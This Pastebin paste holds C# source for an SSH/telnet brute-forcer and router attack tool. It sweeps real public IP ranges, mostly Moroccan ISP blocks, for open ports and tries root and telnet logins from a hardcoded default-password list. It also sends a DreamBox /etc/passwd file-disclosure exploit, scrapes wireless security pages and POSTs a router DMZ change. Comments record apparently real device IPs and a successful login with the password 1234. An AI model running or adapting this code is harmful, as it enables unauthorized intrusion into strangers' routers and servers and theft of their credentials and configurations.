Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Collections; //ArrayList
- using System.Collections.Generic;
- using System.IO;
- using System.Linq;
- using System.Text;
- using System.Threading;
- using System.Net.Sockets;
- using System.Net;
- using Tamir.SharpSsh;
- //TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
- //JA
- namespace sshbruteforcer
- {
- public static class IPAddressMask
- {
- private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
- {
- if (mask == null)
- {
- throw new ArgumentException();
- }
- addressBytes = ipAddress.GetAddressBytes();
- maskBytes = mask.GetAddressBytes();
- if (addressBytes.Length != maskBytes.Length)
- {
- throw new ArgumentException("The address and mask don't use the same IP standard");
- }
- }
- public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
- {
- byte[] addressBytes;
- byte[] maskBytes;
- CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);
- byte[] resultBytes = new byte[addressBytes.Length];
- for (int i = 0; i < addressBytes.Length; ++i)
- {
- resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
- }
- return new IPAddress(resultBytes);
- }
- private static IPAddress empty = IPAddress.Parse("0.0.0.0");
- private static IPAddress intranetMask1 = IPAddress.Parse("10.255.255.255");
- private static IPAddress intranetMask2 = IPAddress.Parse("172.16.0.0");
- private static IPAddress intranetMask3 = IPAddress.Parse("172.31.255.255");
- private static IPAddress intranetMask4 = IPAddress.Parse("192.168.255.255");
- /// <summary>
- /// Retuns true if the ip address is one of the following
- /// IANA-reserved private IPv4 network ranges (from http://en.wikipedia.org/wiki/IP_address)
- /// Start End
- /// 10.0.0.0 10.255.255.255
- /// 172.16.0.0 172.31.255.255
- /// 192.168.0.0 192.168.255.255
- /// </summary>
- /// <returns></returns>
- public static bool IsOnIntranet(this IPAddress ipAddress)
- {
- if (empty.Equals(ipAddress))
- {
- return false;
- }
- bool onIntranet = IPAddress.IsLoopback(ipAddress);
- onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask1)); //10.255.255.255
- onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask4)); ////192.168.255.255
- onIntranet = onIntranet || (intranetMask2.Equals(ipAddress.And(intranetMask2))
- && ipAddress.Equals(ipAddress.And(intranetMask3)));
- return onIntranet;
- }
- }
- public class Program //(string ipaddress)
- {
- // public Socket Sock_scan;
- static Byte[] m_byBuff = new Byte[32767];
- int Max_thread=50;
- private static AsyncCallback callbackProc ;
- private static ArrayList m_ListOptions = new ArrayList();
- static Char IAC = Convert.ToChar(255);
- static Char DO = Convert.ToChar(253);
- static Char DONT = Convert.ToChar(254);
- static Char WILL = Convert.ToChar(251);
- static Char WONT = Convert.ToChar(252);
- static Char SB = Convert.ToChar(250);
- static Char SE = Convert.ToChar(240);
- // ManualResetEvent instances signal completion.
- private static ManualResetEvent connectDone =
- new ManualResetEvent(false);
- private static ManualResetEvent sendDone =
- new ManualResetEvent(false);
- private static ManualResetEvent receiveDone =
- new ManualResetEvent(false);
- // The response from the remote device.
- private static String response = String.Empty;
- public static Compteur_thread cpt_th = new Compteur_thread();
- string ipaddress;
- int portx;
- //public static IPAddress address = IPAddress.Parse("10.20.10.5");
- //bool onTheIntranet = address.IsOnIntranet();
- public Program(string ipaddress, int portx)
- {
- this.ipaddress = ipaddress;
- this.portx = portx;
- //this.cpt_th = new Compteur_thread();
- }
- public static void Main(string[] args)
- {
- Program p1 = new Program("go",5);
- //p1.go();
- Thread th_Scan_ip_port = new Thread(new ThreadStart(p1.go));
- th_Scan_ip_port.Start();
- }
- public void go()
- {
- // CScanner_IP s;
- // s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
- byte[] t_IP_start;
- byte[] t_IP_end;
- // IPAddress MyExternalIp = GetExternalIp();
- // Console.WriteLine("MyExternalIp=" + MyExternalIp);
- // string[] s_ip = MyExternalIp.ToString().Split('.');
- // string[] s2_ip = MyExternalIp.ToString().Split('.');
- string adresse_en_cours;
- int Port_start=22;
- int Port_end=23;
- Thread th_Lance_Scan;
- Thread th_Scan_ip_port;
- cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);
- //Decoupe IP debut
- //196.28.249.--- Burkina Faso
- //41.202.193.--- Cameroun
- //195.24.206.--- Cameroun
- //90.4.125.--- France
- //202.152.43.--- Indonésie
- //202.159.126.--- Indonésie
- //http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
- //41.214
- string[] s_ip = { "41", "141", "1", "1" }; //zawi 41.250.195.107
- //string[] s_ip={"41", "250", "75", "1"}; //zawi 41.250.195.107
- //string[] s_ip = { "81", "192", "102", "1" }; //Maroc telecom ip fixe 81.192.102.8: netpeas 81.192.152.205: cnia
- //41.248.0
- //41.248.158.92
- //string[] s_ip = { "41", "141", "235", "1" }; //example: 41.141.235.82
- //41.141.55.16 Agadir
- //41.143.11.192
- //41.250.59.57
- //41.250.118.53
- //41.250.129.142
- //string[] s_ip = { "41", "250", "82", "159" }; //example: 41.250.82.159
- // string[] s_ip = { "196", "12", "232", "1" }; //196.12.232.120 <snip> location
- //196.206.198.10 Rabat
- //string[] s_ip = { "41", "250", "136", "1" }; //<snip> location 41.250.136.238
- //string[] s_ip = { "41", "250", "150", "18" };
- //string[] s_ip = { "41", "250", "195", "1"}; //zawi 41.250.195.107
- //string[] s_ip = { "41", "251", "16", "1" }; //<snip> location 41.251.16.238
- //string[] s_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
- //http://www.robtex.com/dns/adsl.iam.net.ma.html#records
- //string[] s_ip = { "196", "217", "240", "1" }; //MENARA (mail)
- //string[] s_ip = { "81", "192", "48", "1" }; //MENARA (dns)
- //string[] s_ip = { "212", "217", "0", "1" }; //MENARA
- t_IP_start = new byte[4];
- // for (int i = 0; i < s_ip.Length; i++)
- // t_IP_start[i] = Convert.ToByte(s_ip[i]);
- t_IP_start[0] = Convert.ToByte(s_ip[0]);
- t_IP_start[1] = Convert.ToByte(s_ip[1]);
- t_IP_start[2] = Convert.ToByte(s_ip[2]);
- t_IP_start[3] = Convert.ToByte(s_ip[3]);
- //t_IP_start[3] = Convert.ToByte("1");
- //string[] s2_ip={"41", "250", "149", "254"}; //zawi
- // string[] s2_ip={"41", "251", "254", "254"}; //zawi
- string[] s2_ip = { "196", "12", "233", "255" }; //196.12.232.120 <snip> location
- //string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location 41.251.35.72
- //string[] s2_ip = { "41", "141", "235", "254" }; //<snip> location 41.141.235.82
- //string[] s2_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
- // string[] s2_ip = { "41", "250", "150", "19" };
- //string[] s2_ip = { "196", "217", "255", "255" }; //MENARA (mail)
- //string[] s2_ip = { "81", "192", "63", "255" }; //MENARA (dns)
- //string[] s2_ip = { "212", "217", "31", "255" }; //MENARA
- t_IP_end = new byte[4];
- // for (int i = 0; i < s_ip.Length; i++)
- // t_IP_end[i] = Convert.ToByte(s2_ip[i]);
- t_IP_end[0] = Convert.ToByte(s2_ip[0]);
- t_IP_end[1] = Convert.ToByte(s2_ip[1]);
- t_IP_end[2] = Convert.ToByte(s2_ip[2]);
- t_IP_end[3] = Convert.ToByte(s2_ip[3]);
- //t_IP_end[3] = Convert.ToByte("255");
- // private void Lancer_Scan()
- // {
- int i=0, j=0, k=0, l=0;
- int max_j=0, max_k=0, max_l=0;
- bool start_j = true;
- bool start_k = true;
- bool start_l = true;
- try
- {
- // Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
- //Console.WriteLine("Debut du scan");
- // if(init_scan != null)init_scan(this, infs);
- for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
- {
- if((start_j) && (t_IP_start[0] != t_IP_end[0]))
- {
- j = t_IP_start[1];
- max_j = 255;
- }
- if((start_j) && (t_IP_start[0] == t_IP_end[0]))
- {
- j = t_IP_start[1];
- max_j = t_IP_end[1];
- }
- if((!start_j) && (i != t_IP_end[0]))
- {
- j = 0;
- max_j = 255;
- }
- if((!start_j) && (i == t_IP_end[0]))
- {
- j = 0;
- max_j = t_IP_end[1];
- }
- for( ;j <= max_j; j++)
- {
- if((start_k) && (t_IP_start[1] != t_IP_end[1]))
- {
- k = t_IP_start[2];
- max_k = 255;
- }
- if((start_k) && (t_IP_start[1] == t_IP_end[1]))
- {
- k = t_IP_start[2];
- max_k = t_IP_end[2];
- }
- if((!start_k) && (j != t_IP_end[1]))
- {
- k = 0;
- max_k = 255;
- }
- if((!start_k) && (j == t_IP_end[1]))
- {
- k = 0;
- max_k = t_IP_end[2];
- }
- for( ;k <= max_k; k++)
- {
- if((start_l) && (t_IP_start[2] != t_IP_end[2]))
- {
- l = t_IP_start[3];
- max_l = 255;
- }
- if((start_l) && (t_IP_start[2] == t_IP_end[2]))
- {
- l = t_IP_start[3];
- max_l = t_IP_end[3];
- }
- if((!start_l) && (k != t_IP_end[2]))
- {
- l = 0;
- max_l = 255;
- }
- if((!start_l) && (k == t_IP_end[2]))
- {
- l = 0;
- max_l = t_IP_end[3];
- }
- for( ;l <= max_l; l++)
- {
- adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
- // Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
- // Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
- // if(debut_scan != null)
- // debut_scan(this, info);
- /*
- Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
- */
- int nb_thread = 0;
- for (int port = Port_start; port <= Port_end; port++)
- {
- /*
- Scanner_IP_Port(adresse_en_cours, port);
- th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
- th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
- th_Scan_ip_port.Start();
- */
- Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);
- Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
- t.Start();
- cpt_th.Incrementer();
- nb_thread = 0;
- cpt_th.Nb_thread(out nb_thread);
- if (nb_thread == this.Max_thread)
- {
- lock (this)
- {
- // Console.WriteLine("DEBUG WAIT1");
- Monitor.Wait(this);
- }
- }
- }
- //http scan
- Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);
- Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
- t2.Start();
- cpt_th.Incrementer();
- nb_thread = 0;
- cpt_th.Nb_thread(out nb_thread);
- if (nb_thread == this.Max_thread)
- {
- lock (this)
- {
- // Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(this);
- }
- }
- //https scan
- Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);
- Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
- t3.Start();
- cpt_th.Incrementer();
- nb_thread = 0;
- cpt_th.Nb_thread(out nb_thread);
- if (nb_thread == this.Max_thread)
- {
- lock (this)
- {
- //Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(this);
- }
- }
- //VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
- Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);
- Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
- t1720.Start();
- cpt_th.Incrementer();
- nb_thread = 0;
- cpt_th.Nb_thread(out nb_thread);
- if (nb_thread == this.Max_thread)
- {
- lock (this)
- {
- //Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(this);
- }
- }
- //RDP scan
- Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);
- Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
- t3389.Start();
- cpt_th.Incrementer();
- nb_thread = 0;
- cpt_th.Nb_thread(out nb_thread);
- if (nb_thread == this.Max_thread)
- {
- lock (this)
- {
- //Console.WriteLine("DEBUG WAIT2");
- Monitor.Wait(this);
- }
- }
- /*
- sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
- th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
- th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
- th_Scan_ip_port.Start();
- cpt_th.Incrementer();
- int nb_thread = 0;
- cpt_th.Nb_thread(out nb_thread);
- */
- /*
- if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
- {
- Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
- if(this.maj_prg_bar != null)
- this.maj_prg_bar(this, ifs);
- this.pas_a_atteindre += this.pas_progress;
- }
- i_progress++;
- */
- /*
- if(nb_thread == this.Max_thread)
- {
- lock(this)
- {
- Monitor.Wait(this);
- }
- if(this.ARRETER_SCAN)
- {
- Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
- if(fin_scan != null)fin_scan(this, inf_s);
- return;
- }
- }
- */
- }
- start_l = false;
- }
- start_k = false;
- }
- start_j = false;
- }
- // Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
- // if(fin_scan != null)fin_scan(this, inf);
- }
- catch(Exception e)
- {
- Console.WriteLine("BADBOY: "+e.ToString());
- }
- // }
- }
- public class Scanner_ip_port
- {
- string adresse_ip;
- int port;
- Compteur_thread cpt_th;
- public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
- {
- this.adresse_ip = adresse_ip;
- this.port = port;
- this.cpt_th = cpt_th;
- }
- public void Scanner_IP_Port()
- {
- try
- {
- // Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());
- IPAddress adresseIP = IPAddress.Parse(adresse_ip);
- IPEndPoint ip = new IPEndPoint(adresseIP, port);
- Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- //Sock_scan.Blocking = false;
- // Connect to the remote endpoint.
- Sock_scan.Connect(ip);
- /*asynchronous
- try
- {
- Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
- }
- catch (Exception e)
- {
- Console.WriteLine("DEBUG BEGINCONNECT: "+e);
- }
- Console.WriteLine("DEBUG RACHEL");
- connectDone.WaitOne(1000);
- asynchronous*/
- // Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
- Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
- // if (scan_en_cours != null) scan_en_cours(this, info);
- /*
- Byte[] RecvBytes = new Byte[256];
- String strRetPage = null;
- Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- Encoding ASCII = Encoding.ASCII;
- strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- while (bytes > 0)
- {
- bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
- }
- Console.WriteLine(strRetPage);
- */
- byte[] data = new byte[4096];
- string banner;
- int recv;
- /*
- NetworkStream ns = new NetworkStream(Sock_scan);
- if (ns.CanRead)
- {
- recv = ns.Read(data, 0, data.Length);
- stringData = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("== BANNER START =======================");
- Console.WriteLine(stringData);
- Console.WriteLine("== BANNER END =======================");
- }
- else
- {
- Console.WriteLine("Error: Can't read from this socket");
- ns.Close();
- // server.Close();
- // return;
- }
- */
- // Receive the response from the remote device.
- /*synchro*/
- recv = Sock_scan.Receive(data);
- banner = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);
- if (banner == "")
- {
- recv = Sock_scan.Receive(data);
- banner = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
- }
- /*synchro*/
- /*asynchro
- Receive(Sock_scan);
- receiveDone.WaitOne(1000);
- // Write the response to the console.
- Console.WriteLine("Response received : {0}", response);
- banner = response;
- asynchro*/
- if (port == 21)
- {
- Sock_scan.Close();
- // ftptry(adresse_ip);
- }
- if (port == 22)
- {
- Sock_scan.Close();
- // sshtry(adresse_ip);
- }
- if (port == 23)
- {
- if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
- {
- }
- else
- {
- recv = Sock_scan.Receive(data);
- banner = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
- if (banner.Contains("ogin:") || banner.Contains("assword:"))
- {
- }
- else
- {
- recv = Sock_scan.Receive(data);
- banner = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
- }
- }
- Sock_scan.Close();
- if (banner.Contains("Connection was denied by remote host according to ACL!"))
- {
- }
- else
- {
- telnettry(adresse_ip, banner);
- }
- }
- if (port == 80)
- {
- string ResponseText = "";
- StreamReader SR = null;
- HttpWebResponse response = null;
- HttpWebRequest request;
- request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
- //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET";
- //request.ContentType = "application/xml";
- response = (HttpWebResponse)request.GetResponse();
- SR = new StreamReader(response.GetResponseStream());
- ResponseText = SR.ReadToEnd();
- Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
- Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
- Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));
- //***********************************************************************************************************************************************
- //DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
- //http://www.exploit-db.com/exploits/18079/
- request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
- //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET";
- //request.ContentType = "application/xml";
- response = (HttpWebResponse)request.GetResponse();
- SR = new StreamReader(response.GetResponseStream());
- ResponseText = SR.ReadToEnd();
- Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
- Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
- Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));
- //***********************************************************************************************************************************************
- //108M Wireless ADSL2+ Router
- //http://41.250.9.119/wlcfg.html //Wireless/Basic
- //http://41.250.9.119/wlsecurity.html //Wireless/Security
- request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
- //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET";
- //request.ContentType = "application/xml";
- response = (HttpWebResponse)request.GetResponse();
- SR = new StreamReader(response.GetResponseStream());
- ResponseText = SR.ReadToEnd();
- Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
- Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
- Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
- //***********************************************************************************************************************************************
- request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
- //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "GET";
- //request.ContentType = "application/xml";
- response = (HttpWebResponse)request.GetResponse();
- SR = new StreamReader(response.GetResponseStream());
- ResponseText = SR.ReadToEnd();
- Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
- Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
- Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
- //***********************************************************************************************************************************************
- //http://41.250.9.119/scdmz.html //DMZ
- request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2"); //dmzAddr
- //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
- request.Method = "POST";
- //request.ContentType = "application/xml";
- string postData = "address=192.168.1.2";
- byte[] byteArray = Encoding.UTF8.GetBytes(postData);
- request.ContentLength = byteArray.Length;
- Stream dataStream = request.GetRequestStream();
- dataStream.Write(byteArray, 0, byteArray.Length);
- dataStream.Close();
- response = (HttpWebResponse)request.GetResponse();
- SR = new StreamReader(response.GetResponseStream());
- ResponseText = SR.ReadToEnd();
- Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
- Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
- Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
- }
- cpt_th.Decrementer();
- //Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
- }
- catch (Exception e)
- {
- /*
- Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
- if (scan_en_cours != null) scan_en_cours(this, info);
- */
- cpt_th.Decrementer();
- // Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
- // Console.WriteLine("EXCEPT: " + e);
- }
- }
- }
- static List<string> passwords = new List<string>
- {
- "admin",
- "1234",
- "cisco",
- "",
- "Admin",
- "root",
- "toor",
- "default",
- "azerty",
- "qwerty",
- "12345",
- "123456",
- "1234567",
- "12345678",
- "dreambox",
- "test",
- "user",
- "demo",
- "ZXDSL",
- "password",
- "agadir",
- "menara",
- "Menara",
- "maroc",
- "vodafone",
- "epicrouter", //conexant telnet
- //http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
- "abc123",
- "monkey",
- "letmein",
- "trustno1",
- "dragon",
- "baseball",
- "111111",
- "iloveyou",
- "master",
- "sunshine",
- "ashley",
- "bailey",
- "passw0rd",
- "shadow",
- "123123",
- "654321",
- "superman",
- "qazwsx",
- "michael",
- "football"
- //123123
- };
- public static void sshtry(string myip)
- {
- Console.WriteLine("sshtry");
- // sshtry("test");
- foreach (string password in passwords)
- {
- try
- {
- Console.Write("-Connecting...");
- SshStream ssh = new SshStream(myip, "root", password);
- Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, password);
- Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac);
- Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion);
- Console.WriteLine("-Use the 'exit' command to disconnect.");
- Console.WriteLine();
- //Sets the end of response character
- ssh.Prompt = "#";
- //Remove terminal emulation characters
- ssh.RemoveTerminalEmulationCharacters = true;
- //Reads the initial response from the SSH stream
- // Console.Write(ssh.ReadResponse());
- ////Send commands from the user
- //while (true)
- //{
- // string command = Console.ReadLine();
- // if (command.ToLower().Equals("exit"))
- // break;
- // //Write command to the SSH stream
- // ssh.Write(command);
- // //Read response from the SSH stream
- // Console.Write(ssh.ReadResponse());
- //}
- ssh.Close(); //Close the connection
- Console.WriteLine("Connection closed.");
- }
- catch (Exception e)
- {
- string response = string.Empty;
- response = e.Message;
- if (response == "Auth fail")
- {
- Console.Write("{0} -> bad ssh password: {1}\n", myip, password);
- // sshtry("12345");
- }
- else
- {
- Console.WriteLine("{0} SSH ERROR -> "+e.Message,myip);
- }
- }
- }
- }
- public static void telnettry(string myip, string banner)
- {
- Console.WriteLine("telnettry");
- Socket Sock_scan;
- byte[] data = new byte[1024];
- string stringdata="";
- int recv;
- //try
- //{
- IPAddress adresseIP = IPAddress.Parse(myip);
- IPEndPoint ip = new IPEndPoint(adresseIP, 23);
- // Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- //Sock_scan.Blocking = false; // This is a non blocking IO
- /*
- // Assign Callback function to read from Asyncronous Socket
- callbackProc = new AsyncCallback(ConnectCallback);
- // Begin Asyncronous Connection
- Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
- */
- // Sock_scan.Connect(ip);
- //recv = Sock_scan.Receive(data);
- //Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
- //}
- //catch (Exception eeeee)
- //{
- // Console.WriteLine(eeeee.Message);
- //}
- String strRetPage = null;
- Int32 bytes;
- Byte[] RecvBytes = new Byte[256];
- Encoding ASCII = Encoding.ASCII;
- /*
- bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- while (bytes > 0)
- {
- bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- }
- Console.WriteLine("Banner telnet: " + strRetPage);
- */
- if (banner.Contains("ogin:") || banner.Contains("sername:"))
- {
- Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- Sock_scan.Connect(ip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);
- #region BANNERS01
- //Exemple: Vulcan
- //<BAD SEQUENCE>
- //Copyright (c) 2001-2003 by Conexant, Inc.
- //login: 01
- //password:
- //Echec Login
- //login:
- //login: 02
- //password:
- //Echec Login
- //login: 03
- //password:
- //Echec Login
- //login:
- //login: 04
- //password:
- //Echec Login
- //login: 05
- //password:
- //Echec Login
- //Perte de la connexion à l'hôte.
- //</BAD SEQUENCE>
- //************************************************************************************
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- //LOGON PASSWORD>
- //(epicrouter)
- //
- //
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // MAIN MENU
- // 0. Select VC Adaptor
- // 1. Display Firmware Version
- // 2. Password Setup
- // 3. Connection Status
- // 4. Network Setup
- // 5. ADSL Setup
- // 6. System Maintenance
- // S. Save Settings and Reset Unit
- // R. Reset Without Saving Changes
- // Q. Quit Session
- // Enter your selection below:
- //>>>
- //(2)
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Password Setup
- // 1. Change Administrative Password
- // 2. Change PPP User Name and Password
- // 3. Change User Password
- // Press 'B' to go Back
- // Press 'M' to go to Main Menu
- // Enter your selection below
- //>>>
- //(1)
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Change Administrative Password
- // Enter New Admin Password:
- // (no less than 8 characters, '&' is not accepted)
- // (Press ESC to quit)
- //>>>
- //
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Confirm Administrative Password
- // Re-enter New Admin Password:
- // (no less than 8 characters, '&' is not accepted)
- // (Press ESC to quit)
- //>>>
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Password Setup
- // 1. Change Administrative Password
- // 2. Change PPP User Name and Password
- // 3. Change User Password
- // Press 'B' to go Back
- // Press 'M' to go to Main Menu
- // Enter your selection below
- //>>>
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Quit Session
- // This will quit current telnet session.
- // Press 'Y' to continue, or 'B' to go back.
- // Press 'M' for main menu.
- //>>>
- //************************************************************************************
- //NetDVRDVS:admin
- //Password:
- //Login incorrect
- //************************************************************************************
- //User Access Verification
- //Username: admin
- //Password:
- //% Login invalid
- //************************************************************************************
- //(212.217.28.244)
- //User Access Verification
- //Password: 1234
- //GPBM>help
- //Help may be requested at any point in a command by entering
- //a question mark '?'. If nothing matches, the help list will
- //be empty and you must backup until entering a '?' shows the
- //available options.
- //Two styles of help are provided:
- //1. Full help is available when you are ready to enter a
- // command argument (e.g. 'show ?') and describes each possible
- // argument.
- //2. Partial help is provided when an abbreviated argument is entered
- // and you want to know what arguments match the input
- // (e.g. 'show pr?'.)
- //GPBM>
- //GPBM>?
- //Exec commands:
- // <1-99> Session number to resume
- // access-enable Create a temporary Access-List entry
- // access-profile Apply user-profile to interface
- // clear Reset functions
- // connect Open a terminal connection
- // disable Turn off privileged commands
- // disconnect Disconnect an existing network connection
- // enable Turn on privileged commands
- // exit Exit from the EXEC
- // help Description of the interactive help system
- // lock Lock the terminal
- // login Log in as a particular user
- // logout Exit from the EXEC
- // name-connection Name an existing network connection
- // pad Open a X.29 PAD connection
- // ping Send echo messages
- // ppp Start IETF Point-to-Point Protocol (PPP)
- // resume Resume an active network connection
- // rlogin Open an rlogin connection
- // set Set system parameter (not config)
- // show Show running system information
- // slip Start Serial-line IP (SLIP)
- // systat Display information about terminal lines
- // telnet Open a telnet connection
- // terminal Set terminal line parameters
- // traceroute Trace route to destination
- // tunnel Open a tunnel connection
- // where List active connections
- // x28 Become an X.28 PAD
- // x3 Set X.3 parameters on PAD
- //GPBM>
- //GPBM>ping 8.8.8.8
- //Type escape sequence to abort.
